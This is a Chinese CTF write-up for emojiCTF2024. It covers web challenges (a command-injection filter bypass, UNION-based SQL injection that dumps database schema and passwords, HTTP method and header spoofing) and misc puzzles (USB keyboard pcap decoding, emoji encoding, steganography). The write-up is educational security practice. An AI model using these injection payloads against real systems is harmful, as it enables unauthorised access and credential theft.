RE:emojiCTF2024

WEB

rce

F12与右键被禁用

image-20250803103722000

1
view-source:

提示

一般是/robot.txt或者/robots.txt

这里是/robots.txt

/fl@g.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php

highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['emo'])){
      $emo = $_GET['emo'];
    if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){
        system($emo);
    }
    else{
        echo "Again";
        }
}
else{
    echo "Try";
}
?>

简单的命令执行

flag在flag.txt

; “ * 空格 b c d e f g h m n o p q r $ {} ^ >

被过滤

空格使用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab)

vi可以使用

payload:

1
2
?emo=vi%09?la?.txt
?emo=tail%09?la?.txt

http

image-20250803111331617

看wp明白需要将请求方法改为PUT 请求

HTTP 请求方法(HTTP method)列表:PUT GET POST HEAD OPTIONS PATCH DELETE TRACE CONNECT

请求/fl1l1l1l1ag.php

image-20250803113354186

e4_sql

测试1”

password和username都存在报错

image-20250803115718942

1
2
username=1" order by 1,2 --+  无报错
username=1" order by 1,2,3 --+ 报错

长度为2

1
password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select group_concat(schema_name),2 from information_schema.schemata --+

image-20250803121318794

查students

1
password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='students') --+ --+

4677adb34606ccc153b74d32c4ce85e0

查information列

1
password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='students' and table_name='information') --+

c1ff5a0d2d60efac9764abaf768acb34

查password

1
password=1' order by 1,2,3,4,5 --+&submit=%E6%8F%90%E4%BA%A4&username=1" union select 1,(select group_concat(password) from students.information)--+

6d50d6694a53251cbc7a3e63715432d1

拿到flag

easy_web

提示一: User-Agent:Baiduspider

image-20250803123309383

根据提示修改UA头

image-20250803123325440

参考:

https://developers.cloudflare.com/fundamentals/reference/http-headers/

增加

1
CF-Connecting-IP:1(任意)

image-20250803123549052

需要增加洋葱的http代理

根据CF文档image-20250803123731566

增加

1
CF-IPCountry:T1

image-20250803123819279

MISC

emoji

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def emoji_to(emos):
    list = []
    for emo in emos:
        code = ord(emo)
        list.append(code)
    return list

if __name__ == "__main__":
    emos = []
    converted = emo_to(emos)
    print(converted)
    


                                    '''ono'''
    '''[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]'''

这个程序的功能是将一串 emoji 表情符号转换为其对应的 Unicode 码点(数字表示)。Unicode 码点是计算机中表示字符的标准数字编码系统,每个字符(包括 emoji)都有唯一的数字标识。

exp:

1
2
3
4
5
enc=[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]
for i in enc:
    print(chr(i),end="")

#👝👣👘👞👲👜👤🐧👡👠👖🐨👪👖👪👦👖🐫👬👥👴

emoji进行 base100解密

https://ctf.bugku.com/tool/base100

ez_png

lsb最高位隐写

image-20250803125842708

keyboard

usb流量

tshark提取

1
tshark- T json -r 题目.pcapng >output.json

筛选所有usbhid.data

1
strings output.json | grep "usbhid.data">1.txt

:output.json的编码可能会使strings无法识别

以下命令转换编码

1
iconv -f UTF-16LE -t UTF-8 output.json | grep "usbhid.data" > 1.txt

得到

image-20250803135334554

去掉字段名

image-20250803135414898

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
              "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
              "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
              "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
              "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

output = []
keys = open('pos.txt')  # 数据文件路径
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
            continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag = 0
print("".join(output))
for i in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i] == "<CAP>":
            flag += 1
            output.pop(i)
            if flag == 2:
                flag = 0
        if flag != 0:
            output[i] = output[i].upper()
    except:
        pass
print('output :' + "".join(output))


1
2
3
/bin/python3.10 /mnt/c/Users/EZLING/Desktop/Tool/脚本/MIsc/USB/键盘/ISCTF2023_EZUSB.py 
flag{<CAP>usb<CAP>_misc_keyboard_<CAP><CAP>test<DEL><DEL><DEL><DEL>flag}
output :flag{USB_misc_keyboard_<CAP>FLAG}

flag{USB_misc_keyboard_flag}

或者mumuzi工具一键梭哈

image-20250803140941968

Time to say good bye

压缩包里有12张图片

根据每一个图片的时间

a=时+分+秒

a的ASCII转字符即可

101 122 95 116 105 109 101 95 102 108 97 103

https://www.rapidtables.org/zh-CN/convert/number/ascii-hex-bin-dec-converter.html

排列的emoji

flag:

image-20250803142735038

题目:image-20250803142759674

根据提示

题目中每个emoji的位置代表了一个数字

题目.png中的emoji们从0开始依次排列

对应flag数字

1
28 26 6 0 6 7 20 7 3 4 1 3 0 7 1

拼接

emojiCTF{282660672073413071}